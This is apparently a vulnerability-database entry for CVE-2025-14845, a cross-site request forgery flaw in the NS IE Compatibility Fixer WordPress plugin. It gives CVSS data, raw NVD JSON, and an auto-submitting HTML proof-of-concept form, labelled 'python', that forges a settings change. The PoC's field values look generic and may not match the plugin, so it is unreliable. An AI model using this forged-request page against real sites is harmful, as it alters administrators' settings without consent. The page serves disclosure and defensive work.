Security Vulnerability Report
中文
CVE-2025-14845 CVSS 4.3 MEDIUM

CVE-2025-14845

Published: 2026-01-07 12:16:57
Last Modified: 2026-04-15 00:35:42

Description

The NS IE Compatibility Fixer plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) in all versions up to, and including, 2.1.5. This is due to missing nonce validation on the settings update functionality. This makes it possible for unauthenticated attackers to modify the plugin's settings via a forged request granted they can trick an administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

NS IE Compatibility Fixer plugin for WordPress <= 2.1.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-14845 --> <!-- This PoC demonstrates the CSRF vulnerability in NS IE Compatibility Fixer plugin --> <!-- When an authenticated admin visits this page, their plugin settings will be modified --> <!DOCTYPE html> <html> <head> <title>CSRF Attack - CVE-2025-14845</title> </head> <body> <h1>Malicious CSRF Page</h1> <p>This page will automatically submit a forged request to modify plugin settings.</p> <form id="csrfForm" action="http://target-site.com/wp-admin/admin.php?page=ns-ie-compatibility-fixer" method="POST" style="display:none;"> <!-- Forge settings update request --> <input type="hidden" name="ns_ie_settings" value="malicious_settings"> <input type="hidden" name="ns_ie_save_settings" value="1"> <input type="hidden" name="option_page" value="ns_ie_compatibility_fixer"> <input type="hidden" name="action" value="update"> </form> <script> // Auto-submit the forged request when page loads document.getElementById('csrfForm').submit(); </script> <p>If you see this message, the attack has been executed.</p> </body> </html> <!-- Alternative: Simple link-based attack --> <!-- <a href="http://target-site.com/wp-admin/admin.php?page=ns-ie-compatibility-fixer&ns_ie_settings=malicious&ns_ie_save_settings=1">Click here</a> -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14845", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:16:57.027", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The NS IE Compatibility Fixer plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) in all versions up to, and including, 2.1.5. This is due to missing nonce validation on the settings update functionality. This makes it possible for unauthenticated attackers to modify the plugin's settings via a forged request granted they can trick an administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://developer.wordpress.org/plugins/security/nonces/", "source": "[email protected]"}, {"url": "https://developer.wordpress.org/reference/functions/check_admin_referer/", "source": "[email protected]"}, {"url": "https://developer.wordpress.org/reference/functions/wp_verify_nonce/", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ns-ie-compatibility-fixer/tags/2.1.5/ns-admin-options/ns_admin_option_dashboard.php#L29", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ns-ie-compatibility-fixer/tags/2.1.5/ns-admin-options/ns_admin_option_dashboard.php#L30", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ns-ie-compatibility-fixer/tags/2.1.5/ns-admin-options/ns_settings_custom.php#L8", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3c25b462-cb9e-4250-bb17-9f2a0bd7665e?source=cve", "source": "[email protected]"}]}}